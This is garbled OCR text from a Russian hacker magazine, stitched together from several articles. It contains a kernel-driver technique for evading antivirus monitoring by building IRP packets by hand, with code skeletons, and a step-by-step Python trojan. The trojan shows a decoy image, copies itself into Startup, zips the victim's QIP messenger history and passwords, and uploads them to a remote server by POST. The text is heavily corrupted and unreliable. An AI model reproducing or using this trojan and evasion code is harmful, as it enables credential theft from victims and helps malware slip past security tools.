$ Егірміге --сЪеск 
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Дефолтовые значения и Іі т И: в ЦЬигАи 



Такие проверки станут происходить каждый день (пакет 
автоматически установил задание с го п ) , а все отчеты об 
изменившихся файлах будет получать гооі на етаіі. 




> ІПІО 

Для большей безо- 



Ясно, что Егірѵѵіге начнетдико орать даже после легальной 
модификации файлов ОС (правка системных конфигов, 
установка пакетов ит.д.], поэтому после любого изменения 
системных файлов (включая файлы /гооЕ) следует обновлять 
базу: 

$ зисіо Егірміге --ирсіаЕе -2 Том 



пасности конфигу- 
рационные файлы 
и файлы политик 
Ігірѵѵіге следует хра- 
нить на РІазЬ-брелке 
(и лучше в закрипто- 
ванном виде). 



Также естьспециальная команда для обновления файла 

ПОЛИТИК: 

$ зисіо Егірміге --ирсіаЕе-роІісу 
--сЕдЕіІе . /Ем.сЕд --роІЕіІе \ 

. /Ем.роі --зіЕе-кеуЕіІе ./зіЕе.кеу \ 
--ІосаІ-кеуЕіІе . /НОЗТЕАМЕ- Іосаі . кеу \ 

. /Емроі . ЕхЕ 



ПОСТСКРИПТУМ 

Какты смогубедиться, защита от посягательств на твою 
систему нетребуетспециальныхзнаний, использования сек- 
ретныхтехникили глубокого понимания И N IX. Всесводится 
кумению держать ОС и себя под контролем и ряду простых 
правил, многие из которых описаны в статье, цц 




> ѵѵагпіпд 

Не устанавливай 
лимиты сразу для 
всех пользователей. 
Это может привести 
ксбоям системных 
утилит, в результате 
чего ОС перестанет 
загружаться. 
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ОБЛАМЫВАЕМ 

ПРОАКТИВКУ 

ЭЛЕГАНТНЫЙ ОБХОД ПРОАКТИВНОЙ ЗАЩИТЫ 
НА УРОВНЕ НУЛЕВОГО КОЛЬЦА 



В ОЧЕРЕДНОЙ СТАТЬЕ ИЗ НАШЕГО ЦИКЛА. ПОСВЯЩЕННОГО «НУЛЕВОМУ» 
КОДИНГУ. РЕЧЬ ПОЙДЕТ О ТОМ. КАК. ОБЛАДАЯ БАЗОВЫМИ ЗНАНИЯМИ 
КОДИНГА В НУЛЕВОМ КОЛЬЦЕ. СЕРЬЕЗНО ОЗАДАЧИТЬ РАЗРАБОТЧИКОВ 
ПРОАКТИВНЫХ СРЕДСТВ ЗАЩИТЫ (С ФАЙРВОЛАМИ МЫ УЖЕ 
РАЗОБРАЛИСЬ. ТЕПЕРЬ ПРИШЛА ИХ ОЧЕРЕДЬ). 



► 088 
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И так, драйвера мы писать уже умеем и, казалось, бы, вот оно 
— счастье! Но не тут-то было. Начинающие драйверопи- 
сатели, как правило, дальше ОЬдРгіпНа в ядре не заходят. 

Со временем, научившись более или менее работать с 
Ыабѵе-функциями ядра, вдруг начинаешь хотеть чего-то 
большего. И вот, нарыв где-то на бескрайних просторах интернета 
код ЮІ -фильтра или функций работы с адресным пространством, 
радуешься, как ребенок. До тех пор, пока не узнаешь, что все твои 
усилия наперед известны антивирям, проактивкам и файрволам. 

В настоящее время флагманы борьбы с малварью вкладывают 
очень значительные средства в разработку передовых программных 
решений (в первую очередь, гіпдО-ЬазесІ), которые представляют 
собой сложные программные комплексы. И поверь мне, их разработ- 
чики зря свой хлеб не едят. Да, в ядре позволено все, но чтобы это 
«все» реализовать, нужно иметь за плечами несколько лет усердного 
кодинга в нулевом кольце, знать отладку кода, анализ крэшдампов, 
а также принципы работы проактивных защит. Опыт показывает, что 
задача выживания в ядре сильно усложняется контролем крити- 
ческих ядерных процессов со стороны всяческих «ѵѵаШМод’ов» — 
стражей, выявляющих малейшую активность в ядре ОС. 

Для подобных проактивных защит, антивирусов и файрволов самый 
распространенный и зачастую единственный способ отследить 
телодвижения мал вар и в ядре — это перехват системных функций. 

К примеру, чтобы отследить создание и запуск процесса в ядре 
системы, чаще всего проактивные защиты перехватывают систем- 
ную функцию ^ѵѵСгеаіеРгосезз либо регистрируют свою саІІЬаск- 
функцию РзЭеЮгеаіеРгосеззМоШуРоцііпе. Точно также загрузка 
сторонних би в адресное пространство процесса отслеживается че- 
рез регистрацию саІІЬаск-функции РзВеШоабІтадеКІоЕиуРоиипе, а 
запись в адресное пространство — перехватом СгеаІеРетоІеТЬгеасІ 
или 2\л/ѴѴгіІеѴігІиаІМетогу; вариантов множество. При этом перехват 
системных функций сводится либо к созданию «заглушки» для сис- 
темной функции, либо к ее сплайсингу (встречается чаще). Это в том 
случае, если перехватываемая функция находится в таблице 55ЭТ — 
КеЭегѵісеЭезсгірІюгТаЫе, экпортируется ядром или одним из драйве- 
ров. Гораздо реже встречается перехват неэкспортируемых функций, 
адрес которых в ядре находится поиском определенной последова- 
тельности байт и вычисляется дизассемблером длин инструкций. 

А раз выживать в ядре как-то надо, то приходится искать хитропопые 
способы заставить ядро выполнять то, что тебе нужно, при этом не 
попадаясь на удочку всяких проактивок. 

Ниже я расскажу, как можно в ядре беспалевно организовать созда- 
ние, открытие, чтение и запись файлов, да так, что ни одна из про- 
активных защит и носом не поведет! 

О НЕМ РЕЧЬ? 

Яне буду читать тебе лекции о мега секретных функциях и особен- 
ностях ядра ОС ѴѴіпсІоѵѵз — обойдемся тем, что лежит на поверхности. 
Речь пойдетоб основах коммуникационных взаимодействий в ядре 
— ІРР- па кетах. ІРР-пакет — это па кет за проса ввода/вывода (1/0 
Редиезі: Раскеі]. Он является основной формой передачи информа- 
ции между ядром, драйверами и пользовательскими приложениями. 

У каждого ІРР- па кета есть та к называемые коды МащгЕипсЕоп и 
МіпогРипсІіоп. Архитектура ядра ѴѴіпсІоѵѵз предусматривает 28 Мащг- 
кодов для ІРР- па кета, их описание можно легко найти в библии 
системного разработчика С. Шрайбера «Недокументированные воз- 
можности ѴѴіпсІоѵѵз 2000». В ѴѴіпсІоѵѵз ООК почему-то описаны не все 
Ма)ог-коды, а только чаще всего встречающиеся, но, тем не менее, 
все существующие ІРР-коды ты сможешь найти в хидере пЫбк.Ь. 
Кроме того, у ІРР- па кета есть та к называемые Міпог-ные коды, 
которые более интересны и куда как более не документированы. 

К примеру, при коннекте на удаленный хост вызывающий процесс 
через библиотеку ѴѴіпзоск посылает драйверу ТСРІР.5У5 ІРР-пакет 
с Мащг-кодом ІРР_М^МТЕРМАЕ^ЕѴІСЕ_СОКІТРОЕ и Міпог-ным 
кодом ТОІ_СОІ\ІІ\ІЕСТ. Для драйвера Есрір.зуз это будет руководством 
к дальнейшим действиям. 




ЖИЗНЕННЫЙ ПУТЫРР 

Думаю, здесь особых проблем с восприятием возникнуть не должно. 
Вместе стем, путь прохождения ІРР-пакета по стеку драйверов не- 
вероятно тернист и непонятен для непосвященного взгляда, а разо- 
браться в нем придется, если хочешь овладеть той техникой, которая 
здесь описывается, хотя быв самых общих чертах. ІРР-пакет об- 
рабатывается драйвером и для его «захвата» (слово некорректно, но 
вполне подходит по смыслу) используется структура под названием 
І0_5ТАСК_Е0САТІ0І\І. Эта структура жизненно необходима при работе 
с ІРР-пакетами, и ни один драйвер, создающий или котролирующий 
ІРР- па кеты, не обходится без ее использования. От себя добавлю — 
научиться правильно обрабатывать ІРР-пакеты с выгодой для себя во 
время их прохождения в стеке драйверов — задача не из легких. 
Жизненный цикл ІРР-пакета начинается с его создания 1/0 менед- 
жером (корректнее будет сказать, что ІРР-пакет все же создается 
исполнительными модулями системы — ядром, драйверами и п р. , 1/0 
менеджер в данном случае — собирательное понятие). Новый 
ІРР-пакет создается вызовом таких системных функций как 
ІоВиіІсІАзупсЬгопоизЕзсІРедиезІ:, ІоВ и іШЭупсбгопоизЕзсІ Редиезі:, 
ІоВиіІсЮеѵісеІоСопІгоІРедиезІ и ІоАІІосаЫгр. Первые две функции 
предназначены для работы с файловой системой, однако ничто не 
помешает нам вызывать их напрямую. ІоВиіІсЮеѵісеІоСопІгоІРедиезІ: 
предназначен для создания ІРР-пакетов с Мащг-кодом I Р Р_ 
МЧ_0ЕѴІСЕ_С0І\ІТР0Е и ІРР_М^МТЕРЫАЕ_ОЕѴІСЕ_СОІ\ІТРОЕ. 
ІоАНосаіеІгр создает ІРР-пакет любого типа. 

Если привести аналогию, то ІРР-пакет сродни5М5-ке, посред- 
ством которой ты можешь общаться со своими друзьями и давать 
им какие-либо указания. Так, стоит послать 5М5 другу насчет 
совместного распития пива или девушке для более интересного 
времяпрепровождения — эта же 5М 5 станет для них направлением 
кдействию. Ситуация с ІРР-пакетами в ядре полностью аналогична 
— к примеру, чтобы создать файл, нужно послать драйверу файловой 
системы определенный ІРР-пакет, получив который, он (т.е. драй- 
вер) файл и создаст, основываясь на тех данных, который ІРР-пакет 
принес с собой. Функция СгеаІеРіІе и ее «заглушка» в пІсИЕсИІ — 
ЖСгеаІеЕіІе сводятся именно к созданию такого пакета и передаче 
его драйверу ФС. 

Чтобы поглубже разобраться со структурой и прохождением 
различных ІРР-пакетов в системе, можно воспользоваться за- 
мечательной утилитой ІРРТгасе (которую я бережно выложил 
на диск). Она позволяет проконтролировать прохождение 
ІРР-пакетов по всем устройствам, зарегистрированным в 
ѴѴіпсІоѵѵз, и является незаменимой, если хочешь быть в теме. 
Так что же нам помешает, не вызывая таких функций, как 
2ѵѵСгеаІеРіІе/2ѵѵРеасІРіІе/2ѵѵѴѴгіІеРіІ.е, собственными ручками 
создать необходимый ІРР-пакет и отправить его на исполне- 
ние? Ровным счетом ничего! 
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> ІПІО 

Для лучшего усвое- 
ния темы настоятель- 
но рекомендую к про- 
чтению книгу Уолтера 
Оуни «Использова- 
ние ѴѴі псіоѵѵз Огіѵег 
Мосіеі»; ее ты также 
сможешь найти на 
диске. 




> СІѴСІ 

На дискеты най- 
дешь программную 
реализацию драй- 
вера, обладающего 
функциональностью, 
описанной в статье, 
а та кже драйвер, 
позволяющий снять 
хуки, установленные 
поверх ЭЭРТ. 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

Качаем последнюю 
версию ѴѴі п О Ьд — 
незаменимого отлад- 
чика и анализатора 
крэшдампов — Мир:// 
тзсіі.ппісгозои.сопп/ 
сіоѵѵп ІоасІ/зут Ьоіз/ 
сІеЬиддегз/сІЬд 
х86 6.1 1 .1 .404.тзі . 



Туре 



МдІАсІсІгвзз 



5/23 



Яадз 



АззосіаШІгр 



ТЬгеасИШЕлігу 



ІоЗіаюз 



ЙедиезіогМойе 


РепсіюдЯвЮюесІ 


ЗшскСоипі 


Сш&пПосэНоп 


Сапсеі 


СапсеНгдІ 


АрсЕпѵігопгпеп! 


АЯосаИопЙадз 



и$егіо$Ь 



ШѳгЕѵѳпі 



Оѵегіэу 



СапсвІЙоийпе 



ІЛегВиШ 



Ы 



СТРУКТУРА ІРР-ПАКЕТА 



Вероятно, ты подумаешь, что для контроля за созданием 
и пересылкой ІВР-пакетов разработчики проактивных 
защит могут организовать их перехват. Теоретически 
это возможно, однако перехват даст непосильную на- 
грузку на антивирус, который окажется похороненным 



под лавиной ІВР-пакетов, потому что таких в системе 
ежесекундно создается несколько сотен, если не тысяч, и 
проконтролировать их все — задача малореальная. 

Этим мы и воспользуемся — не вызывая системных 
функций мы ручками создадим нужный нам ІРР-пакет, 
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ДЛЯ ИЗУЧЕНИЯ ІРР-ПАКЕТОВ В ПРИРОДЕ ТЕБЕ 
ПОНАДОБИТСЯ ІРРТКАСЕ 



наделим его необходимой функциональностью и заставим систему 
его переварить! 

5ТЕАИН-С03ДАНИЕ И ЧТЕНИЕ ФАЙЛА 

Для того чтобы создать файл, не вызывая ІЧаЕѵе-функции ядра 
2ѵѵСгеаІеРіІе (или реже — ІоСгеаІеРіІе], мы будем следовать очень 
упрощенному алгоритму: 

1) Вызовом функции ОЬСгеаІеОЬіесІ с параметрами КегпеІМобе 
и I о Рі ІеО ЬіесТТуре создадим основу файла — пустую структуру 
РИЕ_ОВІЕСТ. 

2) Заполним поля созданной структуры нужными нам значениями. 

3) Вызовом I оАІІосаѣе I гр создадим и заполним ІРР-пакет с флагом 
ІРР_СРЕАТЕ_ОРЕРАТІОІ\І и ІВР_5ѴМСНВ0І\І01І5_АРІ. 

4) Вызовом системной фукнции ЗеСгеаІеАссеззЗіаІе определим 
права доступа для создаваемого файла. 

5) Создадим стек для ІРР-пакета с параметром МаргРипсбоп, равным 
ІРР_|ѵи_СРЕАТЕ, и отправим ІРР-пакет драйверу на исполнение. 

Вот примерный скелет кода, реальный код ты можешь найти на диске: 

СОЗДАЕМ ФАЙЛ ЧЕРЕЗ ІРР-ПАКЕТ 

рігр = ІоАІІосаЬеІгр (ЬеѵісеОЪз есЬ->ЗЬаскЗІ 2 е , ЕАЬЗЕ) ; 
зЬакиз = ОЬСгеаРеОЬз есР (КегпеІМосІе , *ІоРі1еОРф есРТуре , 
&оЪэ есРАРРгіЬиРез , КегпеІМосІе, ШЬЬ, 
зігеоР (ЕІЬЕ_ОВЬЕСТ) , О, О, 

(РѴОІЬ * ) &Рі1еОЬ^есР) ; 

(...) 

РіІеОЬ^ есР->Туре = ІО_ТУРЕ_ЕІЬЕ ; 

(...) 

ігр->РІадз |= ІКР_СКЕАТЕ_ОРЕКАТІСЖ | 
ікр_зуыснкошиз_АРі ; 
зРаРиз = ЗеСгеаРеАссеззЗРаРе 

( &ассеззЗРаРе , &аихБаРа, БезігесіАссезз , 
ІоСеРРіІеОЬз есРСепегісМарріпд ( ) ) ; 

(...) 

зРаск = ІоСеРЫехРІгрЗРаскЬосаРіоп ( ігр) ; 
зкаск->Ма:і огЕипскіоп = ІКР_МЦ_СКЕАТЕ ; 

(...) 

зРаРиз = ІоСаІІБгіѵег (БеѵісеОЬ^ есР , ігр) ; 

Чтение файла выглядит немного проще. При чтении файла 
нам понадобится указатель на РІ ЕЕ_0 ВЧ ЕСТ для того файла, 
который нужно прочесть. Опять-таки создадим пустой ІРР- 
пакет, далее — вызовом ІоАНосаІеМсІІ выделим кусок памяти 



под те данные, что мы будем читать. Заполним ІРР-пакет 
нужными значениями, не забыв указать флаг пакета, равный 
ІВР_ВЕАВ_ОРЕВАТІОІ\І. Создадим стеке полем МащгРипсНоп, 
равным ІРР_МІ_ВЕАО, и отправим пакет на выполнение. Вот 
и все! 

ПИШЕМ В ФАЙЛ 

Единственное отличие от чтения файла будет во флагах, которые 
нужно назначить ІРР-пакету — длязаписи в файл нам нужен флаг 
ІВР_ѴѴРІТЕ_ОРЕВАТІОІ\І. 

ПИШЕМ В ФАЙЛ ЧЕРЕЗ СОЗДАНИЕ ІРР-ПАКЕТА: 

рігр = ІоАІІосаРеІгр (сіеѵісеОЬз есР->ЗРаскЗІ 2 е , ЕАЬЗЕ); 
рІгр->Мс!ІАс1с1гезз = ІоАІІосаРеМсІІ (ВиРРег , ЬепдЬЬ., 
ЕАЬЗЕ, ТКЬЕ, ШЬЬ) ; 

(...) 

МтВиі1<іМ<ТІРогМопРадесІРоо1 (рІгр->М<іІАс1с1гезз ) ; 

(...) 

рІгр->ЕІадз = ІКР_ШІІТЕ_ОРЕКАТІ(Ж; 

(...) 

зРаск = ІоСеРЫехРІгрЗРаскЬосаРіоп (рігр) ; 
зРаск->Маз огЕипсРіоп = ІКР_МСГ_ШКІТЕ ; 

(...) 

зРаРиз = ІоСаІІБгіѵег (сІеѵісеОкП есЬ , рігр); 

Для полноты открывающейся взору картины могу добавить, что в 
драйвере новичку может встретиться незнакомая на вид функция 
— ІоБеіСотрІеІіопВоіЛіпе. Она регистрирует особый обработчик — 
ІоСотрІеЕоп, который будет вызван, когда следующий по уровню 
драйвер закончит обработку нужного нам I В Р- па кета. В нашем слу- 
чае эта функция нужна, если мы хотим увидеть и проконтролировать 
выполнение нашего ІРР-пакета после прогулки по стеку драйверов. 

ПИШЕМ В ФАЙЛ 

До смешного просто выглядит в ядре удаление файла — все, что нам 
нужно, это вызвать функцию ІоЗеЧпіюгтаЕоп с переданными ей 
параметрами структуры ЕІЕЕ_ВІ5Р05ІТІ0І\І_ІІ\ІЕ0ВМАТІ0І\І. Правда, 
справедливости ради, надо сказать, что многие «файловые файрво- 
лы», как их любят называть, ставят фильтры на устройства файловой 
системы, и подобный трюкдля них — ерунда. 

ЕІЬЕ_ЬІЗРОЗІТІ(Ж_ШЕОКМАТІСЖ Мі ; 

зЬаЬиз = ОЬЕеІегепсеОЬз есЬВуНапсІІе (ЕіІеНапсІІе , 

О , * ІоЕіІеОЬф есЬТуре , КегпеІМосІе, 

&Іі1еОЪз есЬ , ШЬЬ) ; 

сІеѵісеОЬф есЬ = ІоСеЬКеІаЬесІВеѵісеОкф есЬ ( ЙіІѳОЪд есЬ ) ; 
Мі . БеІеЬеЕіІе = ТКЬЕ; 

зЬаЬиз = ІоЗеЫпІогшаЬіоп ( ТіІеОЪэ есЬ , 
РіІеБізрозіЬіопІпІогшаЬіоп , 

зігеоі (ЕІЬЕ_ВІЗРОЗІТІСЖ_ШРОКМАТІ(Ж) , сіі ) ; 

ЗАКЛЮЧЕНИЕ 

Таким же нехитрым образом можно вполне успешно совершать 
множество действий в ядре и обойтись без вызова основных 
системных функций. Это позволит довольно безопасно существо- 
вать, а главное — выживать в ядре операционной системы, не 
привлекая внимания бдительных стражей — антивирей и проак- 
тивных защит. 

Ты можешь спросить: «а какже запись в адресное пространство 
процесса, являющегося основой удаленного внедрения кода? Каким 
образом можно добиться этого, не привлекая внимания антивирей 
и проактивок?». «Неразрешимых задач нет, — отвечу я. — Из этой 
ситуации можно выйти, задумавшись о перезаписи или подмене 
РТЕ для нужного процесса». Именно так, к примеру, работает руткит 
ЭЬасІоѵѵѴѴаІкег. Не бойся экспериментировать, удачного компилиро- 
вания и да пребудет с тобой Силаізс 
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ТРОЯН НА РѴТНОЫ 

ОСНОВЫ ЗЛОВРЕДНОГО КОДИНГА 
НАРУШИТ ПОД ѴШ0ѴѴ5 7 

ДА ВИННИ СКАЗАЛ: «СУЩЕСТВУЕТ ТРИ РАЗНОВИДНОСТИ ЛЮДЕЙ: 

ТЕ. КТО ВИДЯТ; ТЕ. КТО ВИДЯТ. КОГДА ИМ ПОКАЗЫВАЮТ; И ТЕ. КТО 
НЕ ВИДЯТ». ПРИМЕНИТЕЛЬНО К НАШЕМУ ВРЕМЕНИ Я БЫ ЕЩЕ ДОБАВИЛ 
ГРУППУ: «ТЕ. КТО ВИДЯТ ВСЕ. КОГДА ИМ НУЖНО». ЧТОБЫ В НЕЕ 
ВСТУПИТЬ. НУЖНО УМЕТЬ ПОЛУЧАТЬ ЛЮБУЮ ИНФОРМАЦИЮ - ЗТО 
УМЕНИЕ МЫ И БУДЕМ СЕГОДНЯ РАЗВИВАТЬ С ПОМОЩЬЮ РѴТНОЫ. 



В ыбор языка для троя н -коди н га — тема для вечных холи варов. 
Хардкорщики кричат, что лишь на АзгтѴе пишется что-то нор- 
мальное. Группа полу-хардкорщиков молится на Си. Поклонни- 
ки практически покойного ОеІрЫтоже не отстают. 

По большому счету, каждый из них прав, ведь всегда найдется 
задача, для которой конкретный язык подойдет идеально. В трояностро- 
ительном цеху Руібоп’у также нашлось место, но пока оно ограничено 
лишь мобильными девайсами. Оно и понятно, ведь для запуска скрипта 
нужен интерпретатор, который ужертв на «большом компьютере» обычно 
не бываетустановлен. Кстати, не проблема — эту трудность мы стобой 
сможем превозмочь. Кроме этого, нужно понимать, что Руібоп’новский 
троян целесообразно использовать л ишь для точечных атак. К примеру, 
для решения задачи типа «1 девчонка типа «блондинка» + одна аська 
типа цір» :). 

РѴШ5ТАИЕР 

На сайте ШрѴ/рѵіпзіаЦег.огд хостится важнейшая для нас на сегодня 
тулза. Она представляет собой набор скриптов, которые позволяют 
из обычного ру-скрипта сделать ехе-шник. Скачивай ее с сайта или 
сдиска и давай потестим. Допустим, ты распаковал ее на ди скО:. 
Конфигурируем: 



Б: \руіпзка11ег> Соп^ідиге.ру 
Теперь для теста в папке О ДіезД создай питоновский скригпНезРру: 
ргіпС "ОК" 

ореп ( " ок . кхк " , "м" ) .шгіке ( ' ок ' ) 

Создание ехе-шника проходит в два этапа. Сначала скриптом Макезрес. 
ру записывается файл «зрес» с параметрами «компиляции», а затем — 
скрипт В и ІШ. ру создает непосредственно экзешник. Скрипт Макезрес. 
ру, кроме пути кру-файлу принимает много разных параметров, но нам 
важны лишь эти: 

• «Р», на выходе получим один лишьехе-шник; 

• «ѵѵ», не показывать консоль, без этого параметра поумолчанию про- 
грамма запускается с консольным окном; 

• «X», использовать ИРХдля сжатия ехе; 

• « - - і со п =б і Іе . і со » , использоватьуказанную иконку. 

Во время разработки желательно использовать только один параметр 
(«Р») с целью создания отладочного режима, — чтобы в результате полу- 
чился один файл и окно, в котором мы бы видели свои ошибки. Проверя- 
ем и компилируем: 



РѴ2ЕХЕ 



Руіпзііаііег — не единственная штука для создания ехе из ру. Есть 
еще модуль Ру2ехе. Он может быть использован для создания 
ѵѵхРуіЬоп, ТкіпГег, Ршѵѵ, РуСТК, ру§ате и многих других автоном- 
ных программ. Но, к сожалению, я не нашел в нем возможности 
создания файла-одиночки. Да и он в использовании несколько 
сложнее, чем Руіпзгаііег. 



ВИРУС ПОД 5УМВІАЫ 



Очень много вирусов написано на РугЬоп для телефонов под 
ЗутЬіап. Всему виной чрезвычайная простота: если ты хочешь от- 
сылать 5М5’ки на свои платные номера, то нужно написать всего 
лишь две строчки: 

ішрогк шеззадіпд 

шеззадіпд . зтз_зепс1 (и 1 02 1 , и"8ирег 8М8") 
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> ѵѵагпіпд 

Помни, что вся 
информация, пред- 
ставленная в статье, 
служит исключитель- 
но ознакомительным 
целям! Мы не несем 
ответственности за 
использование опи- 
санныхтехнологий 
в противозаконных 
целях. 




> сіѵсі 

•Подробно отком- 
ментированные 
исходники учебного 
троя с нетерпением 
ждуттебя на нашем 
крутецком 0Ѵ0. 

•Видео по «компи- 
ляции» и запуску 
ПО также смотри на 
диске. 




НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

•Сайт РуІпзіаІІег: 
ЫТрУ/руіпзіаЦег.огд . 

• Сайт Ру2ехе: Міді// 
ру2ехе.огд . 




ПИТОН ДЛЯ САМЫХ МАЛЕНЬКИХ :) 



Б: \руіпзБа11ег> Макезрес . ру -Е -X сЗ. : \БезБ\ 
БезБ . ру 

Б: \руіпзБа11ег> Виііб.ру сі : \руіпзБа11ег\БезБ\ 
БезБ . зрес 

Несколько секунд ожидания... готово! Результат работы 
покоится в папке сіЛруіпзІаІІегѴезДсІізД. Наш іезБехе по- 
лучился размером в 2.4 Мб, и, если его запустить, то может 
показаться, что ничего не сработало — окна нет. Однако 
ок.іхі создается, а значит, все отлично работает. 

КАРТИНКА Т03ТРШ6 

Для начала обеспечим нашей программе некий минимум 
правдоподобности. Обеспечить ее для блондинки довольно 
просто — покажем ей красивую картинку, тут-то она и рас- 
тает:). Поскольку всехозяйствоу насдолжно покоиться 
в одном ру-файле, то картинку нужно будет сжать, а потом 
закинуть в Ьазе64 (превратив в строку). Теперь — немножко 
питоновской магии с объектом дгір.ОгірРіІе, которому при 
создании мы указываем, куда сохранять уже сжатые дан- 
ные, и получаем код, который читает файл тудрд, сжимает, 
кодирует функцией Ьазе64.епсобез1;гіпд в строку Ьазе64 и 
полученную строку-изображение сохраняет в гег_ітд.Ш: 

ітрогБ ЗБгіпдІО, дгір, Ьазеб4 

гбиБ = ЗБгіпдІО . ЗБгіпдІО ( ) 



#создать картинку из ішд и показать ее 
#узнать папку с автозагрузкой 
Скопировать себя в автозагрузку 
Создать архив дір и отослать на сервер 
еізе : 

#достать команду на сервере и исполнить ее 

ЗТКШ6 ТО КАРТИНКА ТО БЛОНДИНКО 

Распаковка файла практически аналогична запаковке. Код это- 
го нелегкого процесса ты всегда можешь посмотреть в исходни- 
ке на диске, а я лишьуточню, что название файла-картинки мы 
берем из исполнимого файла для уменьшения палевности: 

Бі1е_згс = зуз. агдѵ [0] 
ішд_паше= Бі1е_згс . зрІіБ ( 1 \\ ' ) [-1] . \ 
зрііб ( 1 . ') [0] 
ітд_паше += ' . і рд ' 

Вместо вышеприведенного кода можно было бы использо- 
вать стандартную функцию для отделения имени от пути, но 
мне проще сделать так, поскольку я извращенец :). 

Ита к, ка рти н ка созда н а , оста ется лишь«исполн ить» ее с 
использованием библиотеки зибргосезз: 

ітрогБ зибргосезз 

зибргосезз . Рореп ( ішд_паше , збе11=Тгие) 

Благодаря заблаговременно указан ному «5беІІ=Тгие», 
картинка откроется так, как если бы пользователь сделал на 
ней обычный даблклик. 

АВТОЗАПУСК 

Самый простой способ автозапуска нашей проги — скопи- 
ровать в папку автозагрузки: 

ітрогБ збиБіІ 

збиБіІ . сору ( зуз . агдѵ [ 0 ] , г ' С : \РгодгатБаБа\ 
МісгозоББ\Шіпскжз\8БагБ Мепи\Ргодгатз\ 
8БагБир\<±гіѵег_ѵіс1ео . ехе 1 ) 

Как видишь, наш учебный троян заточен под английскую 
версию ѴѴіпсІоѵѵз 7, поэтому для работы с другими версиями 
константы путей нужно будетлибо поменять, либо динами- 
чески вытаскивать их из стандартных переменных винды: 



гіііе = дгір . СгірЕііе (тобе= 1 ѵ/б 1 , Бііеобз =гбиБ) 
гБіІе.шгіБе (ореп ( 'ту . зрд ' , 1 гб' ) . геаб ( ) ) 
гіііе . сіозе ( ) 



%ѵ\гіпс!іг% 

%АРРБАТА% 

%ТЕМР% 



ореп ( 1 гег_ішд . БхБ ' , ' ѵг ' ) . мгіБе ( 
базеб4 . епсобезБгіпд ( гбиБ . деБѵаІие ( ) ) 

) 

Теперь, имея в своем распоряжении строку- картинку, мы 
можем приступить собственно к коди нгу. В начале файла Тгоі- 
ру в переменную ітд мы поместим нашу картин кус ге 2 _ітд. 
М. Логика этого кода будет вы гл я деть примерно так (подроб- 
ности — в сорце на диске): 

ітд = 1 1 1 
Н43ІАМШ8Е. . . 

ІтрогБ зуз 

#если мы запущены первый раз 

ІБ ( зуз . агдѵ [ 0 ] . Біпсі ( ' ЗБагБир ')==-!) : 



Полный списокпеременных можноузнать, написав в кон- 
соли команду «зеі», и эту же команду вместе с зибргосезз. 
Рореп нужно заюзать, чтобы получить эти переменные из 
скрипта. 

КОПИРУЕМ ВСЕ! 

Теперь, когда мы отвлекли внимание юзера ушастого и за- 
крепились в автозагрузке, можно начать исполнение нашей 
основной задачи, отправив на сервер архив папки с истори- 
ей и паролями цір’а — СЛРгодгат РіІезѴЗІРМізегзѴ 
Создадим в папке Тетр архив, заюзав библиотеку гірЛІе. 
Для этого создадим объектгірГіІе.2ірРіІе и рекурсивно прой- 
демся по папке цір, добавляя в архив все файлы: 

ітрогБ гіріііе 



► 094 
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кодим-покодим... 



йеі ас!сІТо2ір ( 2 І , раЫі, гірраСЬ) : 
і.і оз . раСЬ. . ізіііе (раСЪ.) : 

2 І . шгіСе (раСЪ., гірраСЪ., гіріііе . 2ІР_БЕЕЕАТЕБ) 
еііі оз . раДЪ.. ізсііг (раБЪ.) : 
іог пт іп оз . ІізБсІіг (раЫг) : 
ас!сіТо2ір ( гі , 
оз .раЫт. зоіп (раБТі, пт), 
оз . раСЪ. . з оіп ( гірраСЪ. , пт) 

) 

зір_іі1е = г ' С : \1#іп<іоѵ7з\Тетр\зузБет_:Еі1ез . гір ' 

гі = гіріііе . 2ірЕі1е ( 2Ір_іі1е , 'ы' , а11оѵ\г2ір64=Тгие) 

зге = г ' С : ХРгодгат Еі1ез\С>ІР\Бзегз\\ ' 

ас!сІТо2ір ( гі , зге, оз . раБЪ . Ъазепате (зге) ) 

гі . сіозе ( ) 

Отослать полученный файл можно, например, через іір, или послать 
розі-запросом. Второй вариант мы и реализуем, воспользовавшись 
библиотекой игШЬ2: 

ігот розБег . епсосіе ітрогБ тиІБірагБ_епсос!е 
ігот розБег . зБгеатіпдіЩБр ітрогБ гедізБег_орепегз 
ітрогБ иг11іЬ2 
гедізБег_орепегз ( ) 

сІ,Ъ = тиІБірагБ_епсос!е ( { " Б " : ореп ( 2Ір_Бі1е , "гЬ" ) } ) 
гедиезБ = иг11іЬ2 . КедиезБ ( "Ь.ББр : / /з/Б . рЬр" , сі, 1і) 
иг11іЬ2 . игіореп ( гедиезБ ) 

Вот и все! Наш учебный троян готов. Разумеется, нив коем случае мы не 
советуем тебе использовать его в противозаконных целях, но на своем 
домашнем компьютере™ вполне можешь его потестить — он судоволь- 
ствием покажеттебе интересную картинку, заархивирует папку с цір’ом 
и отправитее на сохранениетвоему лучшему другу. Отличное решение, 
ведьеслитвой компьютер поразит злой вирус — ты всегда сможешь вос- 
становиться из хранящегося у друга бэкапа! 

А ЕСТЬ ЛИ БУДУЩЕЕ? 

У нашего продукта есть один существенный минус — а именно, размер 
(большой размер!) исполнимого файла. Плюсы тоже есть; к ним относит- 
ся скорость написания и последующей модификации. А исходник можно 
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СОСТАВ НАШЕГО ЕКЗЕШНИКА 



очень легко шифровать и изменять, что сильно осложнитсигнатурный 
поискполучившегося зловреда. 

Быть или не быть — решать тебе. Если будет нужна помощь, то ты знаешь, 
где меня найти, □с 
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ЛОВИМ И КОНТРОЛИРУЕМ ВЕСЬ 
ТСРЖР-ТРАФИК НА КОМПЬЮТЕРЕ 



МЫ ПРОВОДИМ В ИНТЕРНЕТЕ 
МОРЕ ВРЕМЕНИ. ИНОГДА 
СЕТУЯ НА ЗЛОГО ПРОВАЙДЕРА 
И МЕДЛЕННЫЙ ТРАФИК. 
ЗАЧАСТУЮ ЭТО ПРОИСХОДИТ 
ИЗ-ЗА ТОГО, ЧТО «ЛЕВЫЕ» 

ИЛИ ТРОЯНСКИЕ ПРИЛОЖЕНИЯ 
ЛОМЯТСЯ В СЕТЬ 
ЗА ОБНОВЛЕНИЯМИ 
И ОТБИРАЮТ ДРАГОЦЕННЫЙ 
ТРАФИК. 
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У каждого из нас может быть запущено множество процессов 
— аська (иногда и не одна], то рре нт, майл-агент и парочка 
браузеров. Всем им нужна сеть. А если ты сидишь с 0РР5- 
модема? Ой-ой-ой. С помощью материала из этой статьи 
ты сможешь узнать, как отследить и наказать злобного 
